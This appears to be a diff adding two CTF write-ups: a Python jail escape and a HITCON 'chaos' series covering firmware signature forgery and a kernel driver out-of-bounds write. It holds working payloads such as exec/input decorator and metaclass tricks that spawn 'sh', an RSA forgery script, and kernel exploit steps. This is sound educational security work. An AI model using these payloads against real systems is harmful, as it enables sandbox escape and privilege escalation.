+To see why exactly, and to see the beauty of this exploit, we first make a quick detour through two *short* python expressions that can give us full code execution without further restrictions[^3] (either still in python, or directly in a shell).
+Without a doubt, the shortest expression I know that achieves this is `help()`, which can spawn a shell through the `more` pager if a topic that takes up more than a page is requested at the interactive help prompt.
+Unfortunately, that requires both a pager being present, and a tty, which isn't the case for this challenge.
+So instead, I went for the second convenient method I knew: `exec(input())`.
+Since we arrive in a fresh execution context, with arbitrary code sent through stdin, the `ast` blacklist no longer applies to our new code, and we can do whatever we want from there.
+
+[^3]: As long as we still have access to the python builtins, otherwise we need to circumvent that, potentially in the second stage again too.
+
+So the full exploit code is something as simple as
+
+```python
+@exec
+@input
+class X:
+ pass
+```
+
+and keeping in mind how [decorators](https://docs.python.org/3/glossary.html#term-decorator) work, we can see that this code is equivalent to
+
+```python
+class X:
+ pass
+X = input(X)
+X = exec(X)
+```
+
+which is essentially the same as our wanted `exec(input())` other than the fact that `input(X)` will also print a representation of the class `X` to stdout before reading.
+
+Since decorators aren't parsed as call expressions or statements, this passes the blacklist, and allows us to finally pass in an input such as `import os; os.system("sh")` to obtain a shell and display the flag.
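
One way to convince yourself of this is to inspect the AST of the payload: the decorators are stored as plain `Name` nodes in the `decorator_list` of the `ClassDef`, and no `Call` node appears anywhere. A small check, written for this writeup rather than taken from the challenge:

```python
import ast

payload = """
@exec
@input
class X:
    pass
"""

tree = ast.parse(payload)
class_def = tree.body[0]

# The decorators are stored as plain names on the class definition ...
decorators = [type(d).__name__ + ":" + d.id for d in class_def.decorator_list]
# ... and no node of a banned type exists anywhere in the tree.
banned = [n for n in ast.walk(tree) if isinstance(n, (ast.Import, ast.ImportFrom, ast.Call))]

print(decorators)  # ['Name:exec', 'Name:input']
print(banned)      # []
```

Only parsing happens here, so the payload itself is never executed.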
+
+See [this example](https://discord.com/channels/984515980766109716/992433413351018526/993233705927712899) for a similar exploit template, but going through some different methods to establish code execution.
+
+## Alternative approaches
+
+With my initial solution behind us now, let's have a look at some of the other approaches, and general techniques that can also allow flag recovery on this challenge.
+The general spirit behind all of these will obviously be to use something in the python ecosystem that ends up calling a function, without being an *explicit* function call.
+The approaches I found or observed roughly fall into three categories:
+
+- Operator overloading
+- Function overwriting
+- Interpreter hooks
+
+These categories can of course overlap somewhat, or not exactly cover everything, but you get the idea :)
+
+### Operator overloading, aka `x.equals("string")` sucks
+
+In python, operator overloading in general works by writing custom functions on your class with special names.
+These are also known as *dunder* methods, after how the names are all enclosed in *d*ouble *under*scores, such as the well-known `__init__` constructor.
+So if we can overwrite functions such as `__getitem__` or `__add__` on a class, or if we can write our own classes with those methods, we can get function calls for example with
+
+```python
+obj[argument]
+# Or
+obj + argument
+```
+
+To overwrite these methods on existing classes/objects, we need to find something that's implemented in plain python, as things implemented in C/in extension modules are read-only.
+Some of the possible approaches are for example:
+
+- the `ast.AST` class and the available `tree` object ([example 1](https://discord.com/channels/984515980766109716/992433413351018526/993310441516314739), [example 2](https://discord.com/channels/984515980766109716/992433413351018526/993241943284924546))
+- the `os.environ` object ([example](https://discord.com/channels/984515980766109716/992433413351018526/993359479477391461))
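
The effect is easy to reproduce with a harmless class. In the sketch below, `Echo` is a made-up class whose dunder methods only report how they were invoked; building the instance still uses a normal call here, which is exactly the part that the following sections work around.

```python
import ast

class Echo:
    def __getitem__(self, key):
        return f"__getitem__ got {key!r}"

    def __add__(self, other):
        return f"__add__ got {other!r}"

obj = Echo()  # an explicit call: fine for a local demo, banned inside the jail

print(obj["argument"])   # __getitem__ got 'argument'
print(obj + "argument")  # __add__ got 'argument'

# Neither trigger expression contains a Call node.
trigger = ast.parse("obj['argument']\nobj + 'argument'")
has_call = any(isinstance(node, ast.Call) for node in ast.walk(trigger))
print(has_call)  # False
```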
+
+### Hippity, hoppity, this attribute is now my property
+
+Since some of these don't take any arguments at all, we'll also need some "one-shot" functions that we can leverage to get either an arbitrary file read, or more python control.
+
+For arbitrary file read, one approach includes overwriting some of the innards of the `license()` builtin function.[^4]
+More specifically, overwriting the "private"[^5] member variable that specifies which files it reads license information from.
+Another approach calls the `breakpoint()` builtin, that by default points to `pdb.set_trace()`, which spawns a pdb debugger.
+With a debugger, we can easily evaluate arbitrary python code again to obtain a system shell.
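
The reason such a "private" member can be overwritten from the outside is that a double leading underscore only triggers name mangling. The class below is a hypothetical stand-in, not the real implementation behind `license`; it only demonstrates the mangling rule.

```python
class Printer:
    """Hypothetical stand-in for an object that remembers which files to print."""

    def __init__(self, filenames):
        # Inside the class body, __filenames is mangled to _Printer__filenames.
        self.__filenames = list(filenames)

    def filenames(self):
        return list(self.__filenames)

p = Printer(["LICENSE"])
print(sorted(vars(p)))  # ['_Printer__filenames']

# From outside the class, the mangled name is an ordinary writable attribute.
p._Printer__filenames = ["flag"]
print(p.filenames())    # ['flag']
```

An attribute assignment like this is an `Assign` node in the AST, so it is not affected by the blacklist.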
+
+Other functions that can be overwritten to get a one-shot function call include `sys.stdout.flush`, which gets called upon interpreter exit, and `sys.stderr.flush`, which can be triggered when an exception occurs.
+Both the `os` and `sys` modules were already imported in the parent context, so we can access either `sys` directly, or pass through `os.sys`.
+
+[^4]: See [hacktricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help) for a reference on exactly which member to write to.
+[^5]: Heh, thanks python.
+
+
+### Everything is an object, even if it's a class
+
+Next up, let's explore a few ways to create objects, of course without calling the constructor explicitly.
+The first approach towards this we can use relies on the concept of [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses).
+In short, a class is itself also an object, and its type/class is known as a metaclass.
+The standard metaclass for classes is `type`, whose own metaclass is, interestingly, `type`.
+The key thing that metaclasses allow us to do is make an instance of a class, without calling the constructor directly, by creating a new class with the target class as metaclass.[^6]
+Since this is all a bit confusing, perhaps, let's show some example code:
+
+```python
+# This will define the members on the "sub"class
+class Metaclass(type):  # Must derive from type to be usable as a metaclass
+    __getitem__ = exec  # So Sub[string] will execute exec(string)
+# Note: Metaclass.__class__ == type
+
+class Sub(metaclass=Metaclass):  # That's how we make Sub.__class__ == Metaclass
+    pass  # Nothing special to do
+
+assert isinstance(Sub, Metaclass)
+Sub['import os; os.system("sh")']
+```
+
+One other example takes this further by overloading the `__instancecheck__` dunder and triggering it through a `match` statement ([example](https://discord.com/channels/984515980766109716/992433413351018526/993222030545666060)).
+
+[^6]: This is starting to feel like a "how many times can you use the word class in a sentence while still being understandable and correct"...
+
+### Exceptional function calls
+
+Another approach to making instances of a class is also documented on [hacktricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#rce-declaring-exceptions): throw and catch an exception.
+Throwing an exception without arguments will automatically call its constructor.
+Then we can either use one of our previously-covered one-shot functions ([example](https://docs.python.org/3/reference/datamodel.html#metaclasses)), or use the operator overloading as with the metaclasses above (what hacktricks does).
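
The implicit construction is easy to observe locally. In this sketch, `Boom` and `created` are names made up for the demonstration; the constructor only records that it ran.

```python
created = []

class Boom(Exception):
    def __init__(self):
        # Runs when `raise Boom` implicitly instantiates the class.
        created.append("constructed")

try:
    raise Boom  # no parentheses, so the AST holds a Raise node but no Call
except Boom as caught:
    instance = caught

print(created)                     # ['constructed']
print(isinstance(instance, Boom))  # True
```

After the `except` clause we hold a genuine instance of our own class, ready for any operator overloading defined on it.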
+
+Writing a one-shot function taking three arguments to `sys.excepthook` could also allow for exploitation by throwing an (uncaught) exception.
+
+And finally, looking at the [reference solution](https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py), we can see that there's even some room to exploit OS/distro-specific functionality to combine with error handling and operator overloading to execute code.
+In particular, here the interpreter will try to import an apt-specific module to potentially report an error in ubuntu-provided modules, but import will instead construct an object that will call an overloaded operator to execute code.
+Without overwriting `__import__` and applying the previous exception-based object construction instead, we could also apply the same `__init__` to `__iadd__` chaining as demonstrated here.
+More generally, defining `__init__` will allow for similar one-shot approaches taking an arbitrary number of arguments, such as we wished for above:
+
+```python
+class X:
+    def __init__(self, a, b, c):
+        self += "os.system('sh')"
+    __iadd__ = exec
+sys.excepthook = X
+1/0
+```
+
+## Conclusion
+
+This jail was leakier than a sieve, and it probably had the largest number of sufficiently distinct potential solutions I've seen on a pyjail so far.
+Together with some payloads that could be directly copy-pasted from previous writeups and hacktricks, this led to a high number of solves.
+The challenge itself was however still a lot of fun, and particularly interesting as a case-study of exploitation approaches that are allowed by a minimal-but-not-trivial AST-based blacklist,[^7] for which I would like to thank the author.
+
+
+[^7]: And obviously, that is exactly what this writeup aims to be :)
+
+### Addendum
+
+While there were a lot of different exploits possible, I'm particularly happy with my initial one, for a few arbitrary reasons:
+
+- It got me a quick first blood
+- It's one of the few exploits that don't need any parentheses at all
+- When looking at it as a code golf challenge, it has the lowest number of characters I've seen in any of the solutions posted on discord. This can even be improved upon slightly by replacing the `pass` in the class body with simply the constant `0`.
diff --git a/HITCON-2021/index.html b/HITCON-2021/index.html
new file mode 100755
index 0000000..e51850e
--- /dev/null
+++ b/HITCON-2021/index.html
@@ -0,0 +1,215 @@
+
+
+
+
+
+HITCON CTF 2021 | Organisers
Last week we played HITCON CTF 2021, one of the hardest events of the year, and placed 4th. During the CTF we (Nspace and gallileo) spent most of our time working on the chaos series of challenges written by david942j and lyc. This writeup explains the structure of the challenges and discusses how we solved each of the 3 stages. Out of nearly 300 teams in the CTF, we were the only team to solve all 3 challenges, and the first team to solve chaos-kernel and chaos-sandbox.
+
+
Let’s get started!
+
+
Challenge architecture
+
+
This series of challenges simulates a custom hardware cryptographic accelerator attached to a Linux computer. The setup is fairly complex and has a lot of moving parts:
+
+
+
A modified QEMU with a custom CHAOS PCI device. The virtual PCI device lets the guest interact with the emulated CHAOS chip.
+
A Linux VM running inside QEMU. The VM loads a driver for the CHAOS chip, called chaos.ko, into the kernel. Userspace programs can talk to CHAOS through the driver.
+
A userspace CHAOS client that uses CHAOS to perform cryptographic operations.
+
A firmware binary that runs on the emulated CHAOS chip.
+
A sandbox binary that emulates the CHAOS chip and runs the firmware.
+
+
+
The following image shows an overview of all the components and how they interact.
+
+
+
+
There are 3 challenges in the series, each with a different flag:
+
+
+
chaos-firmware (10 solves, 334 points): the flag is in a file outside the VM (flag_firmware).
+
chaos-kernel (3 solves, 421 points): the flag is in a file inside the VM that only root can read.
+
chaos-sandbox (2 solves, 450 points): the flag is in a file outside the VM (flag_sandbox).
+
+
+
CHAOS virtual device
+
+
CHAOS is a virtual cryptographic accelerator attached to the PCI bus of the virtual machine. It exposes 2 PCI memory resources to the VM: an MMIO area with 16 registers (csrs), and 1 MB of dedicated on-chip memory (dram). The VM can interact with CHAOS by reading and writing to these two memory regions, and CHAOS can send interrupts to the VM. The implementation is split into 3 parts: a virtual PCI device in QEMU, a sandbox binary, and some firmware that runs on the virtual chip.
+
+
The PCI device in QEMU doesn’t do much. At startup it allocates space for the two memory regions using memfd and launches the sandbox binary. The QEMU process and the sandbox share the two memfds and two eventfds used to signal interrupts. After startup, the virtual PCI device is only used to send interrupts to the VM or the sandbox and to handle the VM’s memory accesses.
+
+
CHAOS sandbox
+
+
The sandbox does the actual chip emulation, so it’s more interesting. At startup it mmaps the two shared memory areas, opens two flag files (flag_firmware and flag_sandbox), and waits until the VM sends it the firmware. Once the VM sends the firmware, the sandbox validates it, forks, and runs the firmware in the child process. The sandbox ptraces the firmware process and uses PTRACE_SYSEMU to intercept all the system calls made by the firmware. The firmware’s system calls are not handled by the kernel, but by the sandbox. This lets the sandbox implement a custom syscall interface for the firmware, and prevents the firmware from directly accessing files or other system resources.
+
+
The sandbox implements only a few system calls:
+
+
+
exit stops the firmware and sends the exit code back to the VM. The sandbox restarts the firmware on the next memory access from the VM.
+
add_key and delete_key add and remove cryptographic keys supplied by the firmware to the sandbox’s key storage.
+
do_crypto performs a cryptographic operation on data supplied by the firmware and returns the result to the firmware.
+
get_flag reads flag_firmware into the chip’s memory.
+
+
+
CHAOS firmware
+
+
The firmware is a flat x86_64 binary, which runs in a child process of the sandbox. Since it runs under ptrace with PTRACE_SYSEMU, it cannot directly make system calls to the kernel, but must do so through the sandbox. The firmware is not executed with execve, but simply loaded in memory and jumped to. It executes in a copy of the sandbox’s memory space, so it has direct access to the MMIO area and the CHAOS device memory.
+The challenge has an example firmware, but also lets us provide our own firmware, which can be an arbitrary binary up to 10 kB in size. The sandbox will refuse to load a firmware image unless it passes an RSA signature check.
+
+
CHAOS driver
+
+
chaos.ko is a Linux kernel-mode driver that interfaces with the virtual CHAOS chip over PCI. It is responsible for managing the CHAOS chip’s memory, loading the firmware, servicing interrupts, and providing userspace programs with an interface to the CHAOS chip. The userspace interface uses a misc character device (/dev/chaos) and exposes two IOCTLs:
+
+
+
ALLOC_BUFFER allocates a buffer of a given size in the CHAOS chip’s memory. This can only be done once per open file. After calling this ioctl the client can access the buffer by mmapping the file descriptor.
+
DO_REQUEST sends a request to perform a cryptographic operation to the CHAOS chip, waits for the request to complete, and then returns.
+
+
+
The chip side of the interface uses two ring buffers: a command queue and a response queue. The command queue contains request descriptors, which specify what operation CHAOS should perform. Each request descriptor contains a pointer to the input data in the CHAOS memory, the size of the data, an opcode, and a request ID. The response queue contains response descriptors (request ID and status code). After enqueuing a new request, the driver signals a mailbox in the CHAOS MMIO area, which makes the sandbox run the firmware, and then blocks.
+
+
When the firmware returns, the virtual PCI device raises an interrupt. The driver's interrupt handler processes the response and then wakes up the waiting request threads. When a blocked request thread sees that the chip completed its request, it unblocks and returns the result to userspace.
+
+
CHAOS client
+
+
The last piece is the client, a regular Linux binary which runs in userspace in the VM. The client can interact with CHAOS through the interface exposed by the driver at /dev/chaos. Just like with the firmware, the challenge provides an example client, but also lets us use our own, which can be an arbitrary binary up to 1 MB in size. Unlike the firmware, the client doesn’t have to pass a signature check. The client runs as an unprivileged user, so it cannot read the flag inside the VM.
+
+
Preparation
+
+
Since the challenge setup is quite complex with a lot of moving parts, we wanted to reduce the complexity and make debugging easier. Since Part 1 and Part 3 can ignore the kernel module and QEMU for the most part, we wrote a script to launch the sandbox binary standalone.
+
+
The setup is quite simple: we create the memfds and eventfds in Python, then use pwntools to spawn the sandbox process. We also have some utility functions for “interacting” with the memory regions. The script shown below already uses part of the solution for Part 1. It also already contains a more “advanced” firmware feature that we added for Part 3: an output buffer, so that we can use printf inside the firmware.
+
+
#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+# for type info in vscode
+from pwnlib.tubes.process import process
+from pwnlib import gdb, context
+from pwnlib.elf import ELF
+from ctypes import *
+import os
+import memfd
+from pwn import *
+from hashlib import sha256
+from math import prod
+from skein import threefish
+import twofish
+
+def memfd_create(name, flags):
+    return memfd.memfd_create(name, flags)
+
+# whatever
+libc = cdll.LoadLibrary("libc.so.6")
+def eventfd(init_val, flags):
+    return libc.eventfd(init_val, flags)
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF('sandbox')
+
+# SETUP LOCAL ENV
+csr_fd = memfd_create("dev-csr", 0)
+log.info("csr_fd: %d", csr_fd)
+os.truncate(csr_fd, 0x80)
+dram_fd = memfd_create("dev-dram", 0)
+log.info("dram_fd: %d", dram_fd)
+os.truncate(dram_fd, 0x100000)
+evtfd_to_dev = eventfd(0, 0)
+log.info("evtfd_to_dev: %d", evtfd_to_dev)
+evtfd_from_dev = eventfd(0, 0)
+
+def preexec():
+    # WARNING: using log.* stuff inside the preexec functions can cause hangs, no idea why
+    # log.info("Before executing, setting up the filedescriptors")
+    os.dup2(csr_fd, 3)
+    os.dup2(dram_fd, 4)
+    os.dup2(evtfd_to_dev, 5)
+    os.dup2(evtfd_from_dev, 6)
+    # log.info("Finished with duplicating filedesc")
+
+def wait_for_interrupt():
+    log.debug("Waiting for interrupt from device")
+    res = os.read(evtfd_from_dev, 8)
+    log.debug("Got 0x%x", u64(res))
+    return res
+
+def send_interrupt(val=1):
+    log.debug("Sending interrupt with val 0x%x", val)
+    os.write(evtfd_to_dev, p64(val))
+
+def write_mem(fd, off, val: bytes):
+    log.debug("Writing to %d @ 0x%x: %s", fd, off, hexdump(val))
+    os.lseek(fd, off, os.SEEK_SET)
+    os.write(fd, val)
+
+def write_mem_64(fd, off, val: int):
+    write_mem(fd, off, p64(val))
+
+def read_mem(fd, off, size) -> bytes:
+    log.debug("Reading from %d @ 0x%x", fd, off)
+    os.lseek(fd, off, os.SEEK_SET)
+    return os.read(fd, size)
+
+def read_mem_64(fd, off) -> int:
+    res = read_mem(fd, off, 8)
+    return u64(res)
+
+def load_firmware(data, dram_off=0):
+    log.info("Loading firmware of size 0x%x, dram @ 0x%x", len(data), dram_off)
+    # mapping firmware directly at beginning of dram, hopefully that's ok lmao
+    write_mem(dram_fd, dram_off, data)
+    write_mem_64(csr_fd, 0, dram_off)
+    write_mem_64(csr_fd, 8, len(data))
+    send_interrupt()
+    res = wait_for_interrupt()
+    int_val = u64(res)
+    log.info("Got interrupt: 0x%x", int_val)  # should be > 0x1336
+    load_res = read_mem_64(csr_fd, 0)
+    log.info("Got result for loading: 0x%x", load_res)
+
+def build_firmware(shellcode):
+ header = p32(len(shellcode))
+ header += p8(0x82)
+ header+=bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
+
+ factors=[13,691267,20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073
+ ]
+ phi = prod([i - 1 for i in factors])
+ dec = pow(0x10001, -1, phi)
+ act = int.from_bytes(sha256(shellcode).digest(), "little")
+ header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little')
+ return header + shellcode
+
+OUT_OFF = 0x50000
+
+def read_outputbuf():
+    ret = b""
+    off = OUT_OFF
+    while True:
+        curr = read_mem(dram_fd, off, 1)
+        if curr == b"\0":
+            break
+        ret += curr
+        off += 1
+    return ret
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    p = process([exe.path] + argv, *a, **kw)
+    if args.GDB:
+        gdb.attach(p, gdbscript=gdbscript)
+    return p
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Full RELRO
+# Stack: Canary found
+# NX: NX enabled
+# PIE: PIE enabled
+
+io = start(preexec_fn=preexec, close_fds=False)
+
+# to allow attaching
+if args.PAUSE:
+    pause()
+
+DRAM_START = 0x10000000
+
+# sh = shellcraft.syscall(0xC89FC, arg0=DRAM_START + 0x1000)
+# sh += shellcraft.syscall(60, 0)
+
+# asm_sh = asm(sh)
+
+import subprocess
+
+subprocess.check_call(['make'])
+firm = read("./firmware")
+# firm = build_firmware(asm_sh)
+load_firmware(firm)
+
+log.info("Firmware read ok => launching firmware now!")
+send_interrupt()
+
+wait_for_interrupt()
+# pause()
+log.info("Got interrupt, firmware is done now!")
+
+output = read_outputbuf()
+
+log.info("Output buffer of firmware is:\n%s", hexdump(output))
+
+log.info("As string:\n%s", output.decode("ascii", errors='ignore'))
+
+io.interactive()
+
+
+
Part 1: Firmware
+
+
The firmware can request the flag for this challenge from the
+sandbox by using the get_flag syscall, and then write it to the CHAOS memory where our client in userspace can read it. Unfortunately the provided firmware never uses this system call, so there is no way to get the flag without either pwning the firmware from userspace or creating our own firmware that gets the flag and passes the RSA signature check. Since the challenge is in both the crypto and the pwn category and we can supply our own firmware, we tried to look for a way to bypass the signature check. This is the function that validates the firmware:
The sandbox verifies only the first 128 bytes of N, but N can be up to 255 bytes long, with the size controlled by us. Furthermore, there are no checks that N is actually a product of two primes. This means that we can sign the firmware with our own RSA key as long as the first 128 bytes of the modulus match the key accepted by the sandbox.
+
+
In short, we have to find a number $N'$ that is equal to the challenge’s $N$ in the lowest 128 bytes such that $\phi(N')$ is easy to compute. Once we have $\phi(N')$ we can compute the private key and sign our own firmware. The intended solution is to look for a prime $N'$, since then $\phi(N') = N' - 1$, but we didn’t think about this during the CTF and instead looked for a composite $N'$ that was easy to factor by setting bits above 1024.
+
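The prime-modulus idea can be illustrated at toy scale. The following is a minimal sketch and not the challenge code: it assumes a checker that compares only the low 16 bits of the modulus (the real check covers 128 bytes), the value `N_LOW` is made up, and trial division is only practical for such tiny numbers. It searches for a prime $N'$ with the required low bits and signs with $d = e^{-1} \bmod (N' - 1)$.

```python
from math import gcd

E = 0x10001  # public exponent, the same value the signing script uses


def is_prime(n: int) -> bool:
    """Trial division; only suitable for the toy sizes used here."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    d = 3
    while d * d <= n:
        if n % d == 0:
            return False
        d += 2
    return True


def find_prime_modulus(n_low: int, low_bits: int) -> int:
    """Return a prime N' with N' mod 2**low_bits == n_low and gcd(E, N' - 1) == 1."""
    t = 1
    while True:
        cand = n_low + (t << low_bits)  # only bits above low_bits are changed
        if is_prime(cand) and gcd(E, cand - 1) == 1:
            return cand
        t += 1


def sign(message: int, modulus: int) -> int:
    """Textbook RSA signature for a prime modulus, where phi(N') = N' - 1."""
    d = pow(E, -1, modulus - 1)
    return pow(message, d, modulus)


def verify(message: int, signature: int, modulus: int) -> bool:
    return pow(signature, E, modulus) == message


LOW_BITS = 16
N_LOW = 0xBEEF  # hypothetical low bits that the toy checker compares
n_prime = find_prime_modulus(N_LOW, LOW_BITS)
msg = 0x1234    # stands in for the firmware hash
sig = sign(msg, n_prime)
print(hex(n_prime), verify(msg, sig, n_prime))
```

The same reasoning applies to a composite $N'$ with a known factorization; only the computation of $\phi(N')$ changes.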
+
Our teammate Aaron eventually found that $N' = (N \bmod 2^{1024}) + 2^{1034}$ works and factors to 13 * 691267 * 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073. This script produces a valid signature for an arbitrary binary:
Now that we can sign and load our own firmware, we only have to write some code that loads the flag using the get_flag syscall and makes it available to the client. The easiest way is to have our client allocate and map a buffer in the CHAOS memory, then send a request to CHAOS. The firmware can then copy the flag into the response buffer and exit. Since we hadn’t yet finished reversing the interface between CHAOS and the driver, we just wrote a firmware that copies the flag everywhere in the CHAOS memory instead of finding the buffer that the client is using.
Flag: hitcon{when the secure bootloader is not secure}
+
+
Part 2: Kernel
+
+
The flag for this part is in the VM, only readable to root. This means that we have to somehow exploit the kernel from our unprivileged client to become root. We control both the userspace client and the firmware, so we can attack the kernel from both sides.
+
+
DMA attack
+
+
CHAOS uses a virtual PCI device. PCI is interesting from an attacker’s point of view because it supports bus mastering, which means that devices can DMA to the host’s memory. Pwning the kernel from such a device would be really easy because the device can read and write to all of physical memory. Unfortunately the virtual PCI device in QEMU doesn’t use DMA, so it’s impossible to DMA to the host memory from the device’s firmware. All that the firmware can do is to write to its MMIO registers and its dedicated memory. Too bad.
+
+
CHAOS driver analysis
+
+
We cannot directly attack the VM’s kernel from the firmware, so it is very likely that we will need to find a bug in the driver and exploit it. We spent a few hours reversing the driver and understanding how it works and eventually found some bugs.
+
+
Recall that the driver uses two ring buffers to communicate with CHAOS. The driver puts commands in the command queue and receives responses in the response queue. Here is the code that adds a new command to the queue:
+
+
int chaos_mailbox_request(struct chaos_mailbox *mailbox, struct chaos_request *req)
+{
+    struct chaos_cmd_desc cmd_desc = {0};
+
+    // Generate a request ID.
+    int request_id = _InterlockedExchangeAdd(&mailbox->request_id, 1) + 1;
+
+    // Copy the request to the CHAOS memory.
+    int ret = chaos_dram_alloc(mailbox->chaos_state->dram_pool, 28LL, &dram_request);
+    if (ret != 0) {
+        return ret;
+    }
+
+    struct chaos_req *dram_req = dram_request.virt_addr;
+    memcpy(dram_req, req, sizeof(struct chaos_request));
+
+    struct chaos_state *chaos_state = mailbox->chaos_state;
+    uint64_t cmd_tail = chaos_state->csrs.virt_addr->cmd_tail;
+
+    mutex_lock(&mailbox->cmdq_lock);
+    uint64_t cmd_head = chaos_state->csrs.virt_addr->cmd_head;
+
+    // Check if the command queue is already full.
+    if ((cmd_head ^ cmd_tail) == 512) {
+        mutex_unlock(&mailbox->cmdq_lock);
+        chaos_dram_free(pool, &dram_request);
+        return -16;
+    }
+
+    cmd_desc.req_id = request_id;
+    cmd_desc.unk = 1;
+    cmd_desc.buf_offset = dram_request.phys_addr - pool->dram_io_map->phys_addr;
+    cmd_desc.size = 28;
+
+    // Add the request to the command queue.
+    memcpy(&mailbox->cmd_queue.virt_addr[cmd_head & 0xfffffffffffffdff], &cmd_desc, sizeof(cmd_desc));
+    chaos_state->csrs.virt_addr->cmd_head = (cmd_head + 1) & 0x3FF;
+    mutex_unlock(&mailbox->cmdq_lock);
+
+    // Set the response to pending in the response queue.
+    int resp_index = request_id & 0x1FF;
+    mailbox->responses[resp_index].result = -100;
+
+    // Send an interrupt to the device.
+    chaos_state->csrs.virt_addr->device_irq = 1;
+
+    _cond_resched();
+    uint32_t result = mailbox->responses[resp_index].result;
+    bool timed_out = false;
+
+    // Wait for the request to complete.
+    if (result == -100) {
+        long time_left = 2000;
+
+        struct wait_queue_entry wq_entry;
+        init_wait_entry(&wq_entry, 0);
+
+        prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
+
+        // Wait up to 2000 jiffies.
+        result = mailbox->responses[resp_index].result;
+        while (time_left != 0 && result == -100) {
+            time_left = schedule_timeout(time_left);
+            prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
+            result = mailbox->responses[resp_index].result;
+        }
+
+        timed_out = time_left == 0 && result == -100;
+        finish_wait(&mailbox->waitq, &wq_entry);
+    }
+
+    chaos_dram_free(pool, &dram_request);
+
+    if (timed_out) {
+        return -110;
+    }
+
+    if ((result & 0x80000000) != 0) {
+        dev_err(mailbox->chaos_state->device, "%s: fw returns an error: %d", "chaos_mailbox_request", result);
+        return -71;
+    }
+
+    req->out_size = result;
+
+    return 0;
+}
+
+
+
This function can write out of bounds of the command queue (which has 512 entries) if the head index read from the CSRs is 1024 or larger. At first glance it looks like this can never happen, because the driver always ANDs the head index with 0x3FF when incrementing it and then clears bit 9 (by ANDing with 0xfffffffffffffdff) when accessing the queue, so the index should always be at most 511. However, the driver is not the only component that can modify the head index. The firmware also has access to it and can set it to arbitrary values. The following PoC sets the index to a very big value and panics the kernel with a page fault:
This gives us an out of bounds read/write, which should be enough to completely own the kernel.
+
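The effect of the two masks can be checked with a few lines of Python. This is only a model of the index arithmetic in the decompiled function; the helper names are ours and the firmware-supplied value is an arbitrary example.

```python
QUEUE_ENTRIES = 512                 # capacity of the command queue
ACCESS_MASK = 0xFFFFFFFFFFFFFDFF    # applied when indexing: clears bit 9 only
INCREMENT_MASK = 0x3FF              # applied when the driver advances the head


def slot_for(cmd_head: int) -> int:
    """Queue slot the driver uses for a head value read from the CSRs."""
    return cmd_head & ACCESS_MASK


def next_head(cmd_head: int) -> int:
    """Head value the driver writes back after enqueuing a command."""
    return (cmd_head + 1) & INCREMENT_MASK


# Every head value the driver itself can produce maps to a valid slot.
worst_driver_slot = max(slot_for(h) for h in range(INCREMENT_MASK + 1))
print(worst_driver_slot)

# A head value written by the firmware keeps all of its high bits.
firmware_head = 1 << 40             # arbitrary example value
print(hex(slot_for(firmware_head)))
```

Only bit 9 is ever removed from the value read from the CSRs, so any higher bit set by the firmware survives into the array index.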
+
Exploit
+
+
The bug we found gives us an out of bounds write relative to the address of the command queue. The index is 64-bit so we can write to almost any address (bit 9 of the index is cleared before accessing the queue). We can write a 13-byte command descriptor containing predictable data.
+
+
struct __attribute__((packed)) chaos_input_rb_desc {
+    // Set by the driver, but predictable.
+    uint16_t req_id;
+    // Always 0
+    uint16_t gap;
+    // Always 1
+    uint8_t unk;
+    // Set by the driver, value between 0 and 0x100000
+    uint32_t buffer_offset;
+    // Always 28
+    uint32_t buffer_size;
+};
+
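To see what the 13 written bytes look like, the packed layout can be reproduced with Python's `struct` module. This is a sketch based only on the struct above; the request ID and buffer offset passed in are made-up example values.

```python
import struct

# Packed little-endian layout: u16 req_id, u16 gap, u8 unk, u32 buffer_offset, u32 buffer_size
DESC = struct.Struct("<HHBII")


def pack_desc(req_id: int, buffer_offset: int) -> bytes:
    """Build a descriptor the way the driver fills it: gap = 0, unk = 1, size = 28."""
    return DESC.pack(req_id, 0, 1, buffer_offset, 28)


raw = pack_desc(req_id=0x0042, buffer_offset=0x1000)  # hypothetical values
print(DESC.size, raw.hex())
```

Because `buffer_size` is always 28, the last three bytes of every descriptor are zero, and `buffer_offset` stays below 0x100000, so most of the written data is fixed or tightly bounded.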
+
+
To get an idea of where our buffer could be and what could be around it, we had a look at the kernel’s documentation, which includes a map of the kernel’s address space on x86. The command queue is located in the CHAOS device memory, and the driver uses devm_ioremap to map that region into virtual memory. ioremap allocates virtual memory from the vmalloc region (0xffffc90000000000-0xffffe90000000000 on x86_64), so the ring buffer will be somewhere in that region. After looking around in GDB for a while we noticed that the kernel stack of our process is also located there. This makes sense, because the kernel’s stacks are also allocated from the vmalloc region by default. Even more importantly, it looked like the kernel’s stack is at a constant, or at least predictable, offset from the command queue. This means that we should be able to reliably overwrite a specific value saved on the stack with controlled data without needing any leaks.
+
+
